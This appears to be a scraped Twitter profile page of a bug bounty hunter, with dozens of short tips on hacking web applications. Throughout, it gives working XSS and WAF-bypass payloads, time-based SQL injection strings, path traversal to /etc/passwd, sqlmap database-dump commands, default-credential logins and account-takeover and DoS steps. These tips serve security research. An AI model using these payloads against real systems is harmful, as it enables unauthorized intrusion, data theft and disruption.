🇸🇦 ROOD | GOAT @0x_rood Twitter profile

Pinned Tweet

🇸🇦 ROOD | GOAT

@0x_rood

9 months

2024 goals? - Leaderboards will talk instead of me

7

2

93

Last Seen Profiles

@bokeplokalmalam

@ShadyOpps

@TUScience

@ZYanWang

@SukaBinorStw4

@yura30747311439

@cukienaknikmati

@Adambenaim85829

@SukaBinorStw4

@lkd72682

@streetvoice_com

@stwmaniax

@EgarsatMutua

@CrinkleKit

@Judith_M2474

@S2smd

@PatriaSumm33109

@bokeplokalmalam

@Richard39842051

@Twolf08365257

@CRdeGR

@HFIELDWRESTLING

@bokeplokalmalam

@mikaduki_2024

@bokeplokalmalam

@billyzucconi

@LKastanes41436

@jamaliaat

@jandakembangstw

@ZioStalin1948

@KateWhite570683

@stw_pdg

@Bdfo0

@UnoOtter

@GodSlayer6921

@RedFoxMasking

🇸🇦 ROOD | GOAT

@0x_rood

1 year

some ways to bypass 403 1- using space symbols exmaple: /admin -> 403 /admin%09 -> 200 /admin%20 -> 200 2- use traversal Example: /admin -> 403 /..;/admin -> 200 you can fuzz with traversal sometimes that's end with results Example: /..;/FUZZ #bugbountytips #BugBounty

10

304

966

🇸🇦 ROOD | GOAT

@0x_rood

9 months

1- Found login page 2- Intercept POST login request 3- Found parameter called config= 4- But Payload ../../../../../../../../../etc/passwd 5- Successfully read data and sorry it's path traversal not LFI #bugbounty #bugbountytips

13

143

785

🇸🇦 ROOD | GOAT

@0x_rood

8 months

Xss is not easy finding 1- Digging for vulnerable endpoint -> 4 Hours 2- Find parameter with param miner 3- Bypass waf -> 30 mins Payload: "><A%20%252F=""Href=%20JavaScript:k=%27a%27,top[k%2B%27lert%27](origin)> #bugbounty #bugbountytips

14

140

788

🇸🇦 ROOD | GOAT

@0x_rood

9 months

New xss payload to bypass cloudflare WAF, i try it and it’s done for me 👍🏻 <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> #bugbounty #bugbountytips

10

148

676

🇸🇦 ROOD | GOAT

@0x_rood

2 years

many people asked me what's my wordlist i posted 3 times before now this is last tweet about it general wordlist: for PHP: for asp, aspx: for java applictions: #bugbountytips

34

272

660

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Sql injection is not necessary inject at payload, You can inject in path Path: /en/gallery/1 POC: en/gallery/1'XOR(if(now()=sysdate(),sleep(3),0))OR' #bugbountytips #bugbounty

12

150

639

🇸🇦 ROOD | GOAT

@0x_rood

7 months

1- Found login page in wayback 2- Fuzzing parameter, found parameter called ID 3- Fuzz ID with intruder in burp from 1-10000 4- There’s some ID’s have different content-length 5- When i use url with these ID’s there’s JwT in response than redirect me to account #bugbountytips

15

99

575

🇸🇦 ROOD | GOAT

@0x_rood

4 months

1- Found path for portal in wayback 2- Fuzz it 3- Found login page 4- Another Fuzzing 5- See /manage-users.php with big content length but 302 status 6- Setup match & replace with 302 to 200 7- Bypass authentication and access to admin panel #bugbountytips #bugbounty

21

78

563

🇸🇦 ROOD | GOAT

@0x_rood

7 months

CSRF Functions + Bypass Checklist #bugbounty #bugbountytips

4

135

526

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Website block single or double quotation when you test xss? Use this payload </script><svg/onload=alert(0)> #bugbounty #bugbountytips

7

112

526

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Add this endpoints to your wordlist wp-config.php.old wp-config.php #BugBounty

8

75

480

🇸🇦 ROOD | GOAT

@0x_rood

1 year

New tip 1- Fuzz target 2- phpmyadmin/setup/index.php --> 403 3- phpMyAdminOLD/setup/index.php --> 200 add phpMyAdminOLD/setup/index.php to your wordlist #bugbounty #bugbountytips

12

108

440

🇸🇦 ROOD | GOAT

@0x_rood

1 year

1- Login with successful password (save resposne body to use it) 2- logout than copy response that’s for successful login attempt 3- paste json body in wrong attempt response 4- your login successfully = ATO Note: there’s no cookie or token it’s just normal body #BugBountytips

30

79

423

🇸🇦 ROOD | GOAT

@0x_rood

8 months

Google Dorks for recon site:*.google.* site:google.* site:*.google.com site:*.google.-*.* -> (good results) #bugbounty #bugbountytips

2

96

425

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Session Hijacking testing step 1.Login your account 2.Use cookie editor extension in browser 3.Copy all the target cookies 4.Logout your account 5.Paste that cookies in cookie editor extension 6.Refresh page if you are logged in than this is a session hijacking #bugbountytips

13

104

419

🇸🇦 ROOD | GOAT

@0x_rood

2 years

1- found port 8888 open at shodan 2- login panel 3- fuzz and found /api 4- this endpoint have section called password that's have username and password but password encrypted with jwt 5- decrypt password in 6- access to dashboard #bugbountytips #bugbounty

14

81

412

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Payload: //....//....//....//....//....//....//....//....//....//etc/passwd Parameter: path= #bugbountytips #BugBounty

12

84

405

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Some websites to check broken links to find broken link hijacking vulnerabilities 1- 2- 3- #bugbountytips #BugBounty

5

117

399

🇸🇦 ROOD | GOAT

@0x_rood

2 years

First bug in bugcrowd using github dork #BugBounty #bugbountytips #infosec

First Bug in Bugcrowd Using Github Dork

Hi Hackers, Bug Hunters

medium.com

6

124

401

🇸🇦 ROOD | GOAT

@0x_rood

1 year

لابات @eLearnSecurity متاحة الان بشكل مجاني: -الشبكات - الجانب الهجومي والدفاعي في الامن السيراني - ثغرات CVE - الكلاود مثل Azure و AWS و Google cloud اللابات تنفع للي يبي يتدرب عشان ياخذ شهادة من عندهم او يقوي نفسه في الامن السيبراني رتويت للفائدة

Lab Environments for Networking, Cyber Security and Cloud | INE Lab Showcase

Try out INE lab environments for free (No Credit Card required)! INE offers 3000+ beginner to expert-level hands-on labs for Networking, Cybersecurity, and Cloud with expert-led courses.

showcase.ine.com

0

83

384

🇸🇦 ROOD | GOAT

@0x_rood

10 months

Another sql injection payload: 14)%20AND%20(SELECT%207415%20FROM%20(SELECT(SLEEP(10)))CwkU)%20AND%20(7515=7515 #bugbountytips #BugBounty

4

104

387

🇸🇦 ROOD | GOAT

@0x_rood

1 year

CVE-2021-40875 POC 1- go to : https://test. com/files.md5 2- this path show you all files in servers 3- you should found this file /db/sqlsrv/full.sql 4- file have Sensive data & Clinet id & secret 5- report it as High/Critical #bugbounty #bugbountytips

6

89

383

🇸🇦 ROOD | GOAT

@0x_rood

2 years

nuclei templates collection #bugbountytips #BugBounty

19

174

375

🇸🇦 ROOD | GOAT

@0x_rood

2 years

$5000 bounty Today is different, I’m the GOAT of this game #bugbounty @Bugcrowd

24

16

357

🇸🇦 ROOD | GOAT

@0x_rood

1 year

اقسم بالله مو مصدق للحين اللي اشوفه انا التاسع على العالم في الثغرات الحرجه ياربي لك الحمد 😭 #BugBounty

51

5

355

🇸🇦 ROOD | GOAT

@0x_rood

2 years

How I found an SSRF ( Reconnaissance ) } #bugbounty #bugbountytips

Bug Bounty { How I found an SSRF ( Reconnaissance ) }

Hello everyone, I am S Rahul, working as a Information Security Analyst at NUK 9 Auditors and A Bug bounty hunter at Hackerone, Bugcrowd…

systemweakness.com

12

104

347

🇸🇦 ROOD | GOAT

@0x_rood

2 years

I’m not using tools for recon part but in last days i found perfect tool for subdomain enumeration i seen it in @GodfatherOrwa live and try it, it’s beautiful tool #bugbountytips #BugBounty

GitHub - iamthefrogy/frogy: My subdomain enumeration script. It's unique in the way it is built...

My subdomain enumeration script. It's unique in the way it is built upon. - iamthefrogy/frogy

github.com

9

85

339

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Best 5 repositories for bug hunters and penetration tester | Thread #bugbounty #bugbountytips #infosec

29

136

341

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Tools i use it in my last live recon -Naabu -Arjun -ffuf -netlas -securitytrails #bugbountytips #BugBounty

live recon with ROOD | بث مباشر ريكون مع رود

تلكرام يحتوي على فيديوات خاصه ب ROODhttps://t.me/alien_rood

www.youtube.com

4

74

333

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Ok, let’s discuss this 1- fuzz website 2- found this path /jk_status?cmd=dump = dump data 3- search more about this misconfigure 4- found /jk_status?opt=0 = read and write privilege #BugBounty #bugbountytips

7

94

330

🇸🇦 ROOD | GOAT

@0x_rood

9 months

الكبير وصلللل كيف وصلت 500 ثغره في اقل من اسبوع + المركز الاول على العالم في الثغرات الحرجة؟ - write up #bugbounty

كيف وصلت 500 ثغره في اقل من اسبوع + المركز الاول على العالم في الثغرات الحرجة؟ - write up

بسم الله الرحمن الرحيم زمان عن الرايت اب اخر رايت اب قبل سنة كامله لاكن اليوم ان شاء الله جاي بحاجة ثقيله جداً قبل 3 اسابيع وصلني انفا...

0xrood.blogspot.com

24

33

330

🇸🇦 ROOD | GOAT

@0x_rood

3 years

1- use ffuf in subdomain 2- /phpldapadmin/ -> 200 ok 3- admin login page 4- try to access admin panel 5- see check box (anonymous login) 6- access with anonymous and read privileges 7- triaged report with high severity 😎 #bugbountytips #BugBounty

12

93

326

🇸🇦 ROOD | GOAT

@0x_rood

21 days

1- here's IDOR leaks PII and parameter called "reset_code" 2- Use victim email in reset password -> It will request OTP from you 3- Back to IDOR request, response was leak reset_code 4- Use it for account takeover #bugbounty #bugbountytips

7

44

333

🇸🇦 ROOD | GOAT

@0x_rood

1 year

4

75

324

🇸🇦 ROOD | GOAT

@0x_rood

3 years

ثريد : ماهو Docker؟ اذا كنت مشغول فضله اورجع له بعدين

2

21

320

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Nothing new, 1- full scan ports with naabu 2- port 9000 is open 3- open website 4- access to sonarqube and found secret’s without authentication 5- تصبحو على خير #BugBounty #BugBounty

11

53

317

🇸🇦 ROOD | GOAT

@0x_rood

1 month

Finding of this day IDOR in cookie, when I change ID it's take me directly to another user account Browser Extension for cookie: #bugbountytips #bugbounty

7

33

323

🇸🇦 ROOD | GOAT

@0x_rood

1 year

TOP 10 SSRF parameters ?dest={target} ?redirect={target} ?uri={target} ?path={target} ?continue={target} ?url={target} ?window={target} ?next={target} ?data={target} ?site={target} #bugbountytips #BugBounty

0

69

312

🇸🇦 ROOD | GOAT

@0x_rood

2 years

one line to get admin login page or panel cat domains_list.txt | httpx -ports 80,443,8080,8443 -path /admin -mr "admin" #bugbountytips #bugbounty

11

96

305

🇸🇦 ROOD | GOAT

@0x_rood

3 years

/api/v1/user/18739 = 403 /api/v2/user/18739 = 200 success Tip: try to change api version #bugbountytips

12

45

307

🇸🇦 ROOD | GOAT

@0x_rood

2 years

1- found server in shodan with ibm http server 8.5.5 2- search on google about cve’s on it 3- found CVE-2020-4463 XXE and pii leak 4- search exploit on github 5- exploit it 6- the rest servers i’m found it on shodan than test it directly #bugbountytips #bugbounty

11

65

306

🇸🇦 ROOD | GOAT

@0x_rood

10 months

Intersting finding: 1- Found applicaion for website 2- Logout and found this endpoint at burp api/logout/My_id 3- So here we have idor at logout 4- Make script with chatgpt that's take loop on all Users id 5- Dos attack for to immobilize all users #bugbountytips #bugbounty

14

38

306

🇸🇦 ROOD | GOAT

@0x_rood

11 months

Bypass email verification 1- Create 2 accounts one you have access on email and another you don't have email on it 2- After verfiy first account, it take you to create password 3- Change email to second account you don't have email access 4- Bypass it. #bugbountytips #BugBounty

🇸🇦 ROOD | GOAT

@0x_rood

11 months

It’s time to take rest and play Fortnite, Tips will be tomorrow #bugbounty

7

132

7

49

303

🇸🇦 ROOD | GOAT

@0x_rood

2 years

How I got a $10,000 Penetration Testing Project/Job with Bug Bounty #BugBounty #bugbountytips

7

63

297

🇸🇦 ROOD | GOAT

@0x_rood

3 years

P1 in 5 minutes 1- subdomain enumeration 2- see interesting sub 3- fuzzing with dirsearch 4- see this path /adminer with login page 5- use default credentials root/root 6- full access to database management portal 😎 #bugbountytips #bugbountytip

12

82

296

🇸🇦 ROOD | GOAT

@0x_rood

10 months

Time sleep sql injection Payload: 'XOR(if(now()=sysdate(),sleep(33),0))OR' #bugbounty #bugbountytips

2

71

301

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Warming up for today Payload: %27%3E%3Ca/+/OnMOuSeOvER%0d=%0dconfirm(document.cookie)%3Ev3dm0s #BugBounty #bugbountytips

6

70

291

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Crunchbase is important tool in recon proccess and it's paid tool but i have sample tricky to see all acquisitions for any company it's google dork Example: site:*.crunchbase.com "acquired by yahoo" #bugbountytips #bugbounty

5

75

293

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Nice tip from @apt511_ if you have mssql and you want to make POC with sqlmap you can add --dbms mssql Command: sqlmap -u https://test\com/endpoint/./asp --dbs --random-agent --time-sec=12 --level=1 --risk=1 --batch --dbms mssql #bugbountytips #bugbounty

🇸🇦 ROOD | GOAT

@0x_rood

9 months

@ZX795385344 سلمت يمينك يا شيخ على ذي tips ❤️❤️❤️❤️

1

0

3

5

67

292

🇸🇦 ROOD | GOAT

@0x_rood

1 year

API wordlists for fuzzing proccess #bugbountytips #bugbounty

GitHub - Net-hunter121/API-Wordlist

Contribute to Net-hunter121/API-Wordlist development by creating an account on GitHub.

github.com

4

80

287

🇸🇦 ROOD | GOAT

@0x_rood

2 years

wait wait, who's back? first it's webmail page - fuzzing the site get /adminconsole/ it's admin login page - /adminconsole/FUZZ - get /adminconsole/install.htm - they take me to settings page that's disclose admin pass and sql info - admin panel pwn #bugbountytips #bugbounty

15

56

285

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Best tool in: Parameters discovery: Arjun, Paraminer Subdomain Enum: securitytrails Fuzzing: ffuf Vulnerabilities discovery: nuclei Xss detection: XSStrike #bugbountytips #BugBounty

6

67

278

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Big thanks guy's for help If the second parameter is vulnerable and you want to test it, copy request from burp than put it in sqlmap command: sqlmap -r request.txt --dbs --random-agent --time-sec=12 --level=1 --risk=1 don't forget to put * at parameter value #bugbountytips

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Guy's i have link with 2 parameters second parameter is vulnerable to sqli but when i choose it with -p it's dosen't work they test just first parameter, what should i do?

6

1

31

11

55

281

🇸🇦 ROOD | GOAT

@0x_rood

2 months

الحمدلله 🙏🙏 #BugBounty

19

3

283

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Endpoint: /phpmyadmin/scripts/setup.php #bugbountytips #BugBounty

8

39

276

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Cool Recon techniques every hacker misses! #bugbounty #bugbountytips

12

79

278

🇸🇦 ROOD | GOAT

@0x_rood

4 months

🫶🫶

15

3

278

🇸🇦 ROOD | GOAT

@0x_rood

11 months

Most weird bug, that’s i discovered Part 1 1- admin login page, put any credentials and change response from 422 to 200 OK 2- it login me to empty panel than after 2 seconds redirect me to login page #bugbountytips #bugbounty

4

37

274

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Here’s resources that’s help me to exploit this issue 1- this tool help me to dump docker images 2- Read discloses reports at hackerone that’s have same situations, it’s help me to know impact and how to exploit it 3- make poc & report it #bugbountytips

4

62

270

🇸🇦 ROOD | GOAT

@0x_rood

2 years

I will explain my port scanning method Note: you need shodan plugin and naabu tool 1- visit website, when i see different ports in shodan opening expect 80,443 2- directly i will make full port scanning 3- naabu -host “ip or domain here” -p - #bugbountytips #BugBounty

8

60

264

🇸🇦 ROOD | GOAT

@0x_rood

1 year

5

67

268

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Here’s my last finding (P1) 1- register account 2- intercept request 3- here’s the response in image so in “role” parameter we have ROLE_USER So i don’t know what i can replace it to privilege my account to admin 4- open source code and look in js files 5- PART 2 #bugbountytips

10

59

262

🇸🇦 ROOD | GOAT

@0x_rood

3 years

Improper access control in 5 minutes 1- use ffuf in your target 2- phpMyAdmin/ —> 200 ok 3- phpmyadmin login page 4- add /setup to your link 5- phpmyadmin/setup/ 6- when you are lucky you can see setup new servers page Medium - high bug #bugbountytips

13

70

265

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Recon power 1- collect acquisitions 2- find ASN 3- reverse whois 4- use Shodan 5- subdomain enum + brute force 6- port scanning 7- fuzzing 8- GitHub dorking Credit: The Bug Hunter’s Methodology v4 @Jhaddix #bugbountytips #infosec

4

86

259

🇸🇦 ROOD | GOAT

@0x_rood

2 years

1- found port 5000 opened with shodan chrome extension 2- found admin panel 3- username: admin password: admin 4- access to admin portal 👽 #bugbountytips #BugBounty

11

29

259

🇸🇦 ROOD | GOAT

@0x_rood

2 years

1- intercept request 2- login 3- when I forward between requests 4- i found request on path that’s called /users/permissions 5- do intercept > respnse on this request 6- i found (“admin”, “false”, admin_id “0”) 7- i change false to true and 0 to 1 8- privilege ✅ #bugbountytips

3

64

258

🇸🇦 ROOD | GOAT

@0x_rood

10 months

1- Go to support fourm 2- There's some inputs like name, email, message 3- Put victim email in input 4- Intercept request 5- You will see 2 hidden parameters in burp for sender mail & cc mail for employees 6- So you can sent mails from offical emails to anyone #bugbountytips

8

56

253

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Top 1 at @Hacker0x01 in critical vulnerabilities

12

3

253

🇸🇦 ROOD | GOAT

@0x_rood

2 years

Idor leads to ATO 1- register on website 2- in account settings we have parameter called ID, it’s have normal id 3- I’m register second account 4- change email and id for second account 5- email changed successfully 6- reset password than takeover #bugbountytips #bugbounty

9

43

251

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Website have function to create and share jobs 1- create job but don't share it 2- start burp and intercept request 3- change job ID to another ID 4- they will delete job thats linked with ID and share your job that's called overwrite misconfiguration #bugbountytips #bugbounty

2

47

248

🇸🇦 ROOD | GOAT

@0x_rood

2 years

in this month I’m get 4 bounties from this bug Steps to reproduce 1- capture reset password request 2- send it to intruder 3- repeat request 50 times 4- if you get 50 message in your email (reset password) you can report it #BugBounty #bugbountytips

18

49

248

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Tool that’s discover new subdomains Note: VPS is required #BugBountytips #infosec

GitHub - e1abrador/sub.Monitor: Self-hosted passive subdomain continous monitoring tool.

Self-hosted passive subdomain continous monitoring tool. - e1abrador/sub.Monitor

github.com

5

80

249

🇸🇦 ROOD | GOAT

@0x_rood

3 months

Found path in source code that’s accessing me direct to admin panel #BugBounty

12

6

246

🇸🇦 ROOD | GOAT

@0x_rood

7 months

CVE-2022-0412 is time based sql injection but you can extract databases with this command sqlmap./py -r request./txt --dbs --random-agent --time-sec=12 --level=5 --risk=3 --batch --flush-session #bugbounty #bugbountytips

4

60

245

🇸🇦 ROOD | GOAT

@0x_rood

1 year

SenGird key starts with: SG.xxxxxxxxxxxx Curl command to create POC: curl -X "GET" "" -H "Authorization: Bearer SENDGRID_TOKEN-HERE" -H "Content-Type: application/json" _______ You can find it in mobile apps & js files #bugbountytips #BugBounty

3

70

245

🇸🇦 ROOD | GOAT

@0x_rood

9 months

This bypass still working, impressive

🇸🇦 ROOD | GOAT

@0x_rood

9 months

New xss payload to bypass cloudflare WAF, i try it and it’s done for me 👍🏻 <dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x> #bugbounty #bugbountytips

10

148

676

2

39

239

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Common methods to found API endpoints 1- Swagger UI Documentation 2- Dictionary Attack | Brute force 3- Common wordlist for API Enum : #bugbountytips #BugBounty

GitHub - Net-hunter121/API-Wordlist

Contribute to Net-hunter121/API-Wordlist development by creating an account on GitHub.

github.com

1

72

234

🇸🇦 ROOD | GOAT

@0x_rood

2 years

1- phpmyadmin setup is enabled 2- kanboard is login page on port 45001 with admin:admin credentials 3- صباح الفل #BugBounty #bugbountytips

13

30

236

🇸🇦 ROOD | GOAT

@0x_rood

2 months

Another 9.8 🎯 with @badcrack3r #BugBounty

11

3

228

🇸🇦 ROOD | GOAT

@0x_rood

1 year

POC tip 1- fuzz target and found /files.md5 2- this file include all files path in server 3- found this path /db/sqlsrv/full.sql 4- this sql file have client ID & secret #BugBounty #bugbountytips

🇸🇦 ROOD | GOAT

@0x_rood

1 year

ونقطة على السطر 👌🏻

7

0

55

12

45

228

🇸🇦 ROOD | GOAT

@0x_rood

9 months

Some priv esc issues Part 1 1- Invite User to your org, than accept invite and try to change email -> P4/P3 2- Invite user but before accept invite delete it, than go to email and accept it, if user added successfully report it P3 #bugbounty #bugbountytips

11

43

228

🇸🇦 ROOD | GOAT

@0x_rood

3 years

ثريد : انواع برامج مكافآت اكتشاف االثغرات ملاحظة : اذا كنت مشغول حطه بالمفضله وارحع له لما تفضى

2

19

213

🇸🇦 ROOD | GOAT

@0x_rood

1 year

1- Found endpoint in waybackurls: /core/Filemanager/index.html?type=Images&CKEditor=full_story&CKEditorFuncNum=110&langCode=en 2- upload any file 3- intercept request in body they show default path for uploading files 4- change it to any directory #bugbountytips #BugBounty

8

45

222

🇸🇦 ROOD | GOAT

@0x_rood

2 years

ثريد: قصة اختراق اوبر #الامن_السيبراني

8

13

220

🇸🇦 ROOD | GOAT

@0x_rood

2 years

All in One Subdomain Enumeration Tool #bugbounty #infosec

GitHub - 0xPugal/SubDomz: An Automated Subdomain Enumeration Tool

An Automated Subdomain Enumeration Tool. Contribute to 0xPugal/SubDomz development by creating an account on GitHub.

github.com

4

80

220

🇸🇦 ROOD | GOAT

@0x_rood

1 year

If you found /actuator/jolokia/ endpoint in your target you can escalate it to LFI POC: https://target[.]com/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd

5

72

220

🇸🇦 ROOD | GOAT

@0x_rood

8 months

Using XSS to Create a Keylogger

Week 13 - XSS Keylogger | Web Hacking Tips

www.webhackingtips.com

0

51

220

🇸🇦 ROOD | GOAT

@0x_rood

1 year

1- Fuzz target 2- found /upload path 3- directory listing enabled 4- one of files name was 1-247.csv 5- disclosure more than 30k PII #bugbountytips #bugbounty

11

32

210

🇸🇦 ROOD | GOAT

@0x_rood

5 months

Tips for ssrf - Just extract endpoints from waymore - See endpoint called Imageurl= - Test Burp collab url (You can see response in burp because it's Image content type) - Than advance exploit - Found 5 Hosts vulnerable with same endpoint #bugbountytips

🇸🇦 ROOD | GOAT

@0x_rood

5 months

Morning findings #BugBounty

9

2

124

4

35

220

🇸🇦 ROOD | GOAT

@0x_rood

1 year

افضل المصادر لتعلم اختبار اختراق تطبيقات الويب (النسخه العربيه) 1- 2- 3- 4- #bugbounty #bugbountytips

6

33

209

🇸🇦 ROOD | GOAT

@0x_rood

3 years

1- find subdomain with 2- see interesting url 3- full port scan 4- port 3001 | open 5- grafana admin portal 6- use default credentials admin:admin 7- success login to admin portal #bugbountytips

🇸🇦 ROOD | GOAT

@0x_rood

3 years

ولعانه اليوم 🤟🏼

12

6

74

5

46

211

🇸🇦 ROOD | GOAT

@0x_rood

1 year

1- find subdomain: cms. compny. com 2- sign in/up page 3- sign up new account 4- login 5- i have full privileges and leak all PII for customers 🌚 #bugbountytips #BugBounty

3

27

214

🇸🇦 ROOD | GOAT

@0x_rood

3 years

شباب في فكره بسويها بدل البثوث فيها فايده لي ولكم اني اسجل bug hunting ولاكن مو لايف مقطع كذا مدته ساعتين وبرفعه على منصه غير اليوتيوب عشان لا ينحذف منها يضل محفوظ للابد ومنها انا ما اتوتر وانا افحص واخذ راحتي والفيديو بيكون بدون صوت لان صعبه اشرح طول الساعتين وانا افحص رايكم؟

33

3

200

🇸🇦 ROOD | GOAT

@0x_rood

2 years

live bug bounty recon at apple - part 1

8

58

206

🇸🇦 ROOD | GOAT

@0x_rood

20 days

The new PC starts

13

6

210

🇸🇦 ROOD | GOAT

@0x_rood

2 years

1- visit website 2- fuzz with default list 3- found /admin.tar.gz 4- extract files and found sensitive data Easy find, but not dup #BugBounty #bugbountytips

12

40

203

🇸🇦 ROOD | GOAT

@0x_rood

2 months

Happy to announce this, i'm most impactful hacker at Critical Reputation on @Hacker0x01 in 2024 Until now #BugBounty

17

3

204

🇸🇦 ROOD | GOAT

@0x_rood

1 year

Nothing unique here 1- found acquisition from google 2- found main domain for acquisition 3- waybackurl 4- endpoint leads me to signup new admin account 5- add/edit/delete privileges #bugbountytips #BugBounty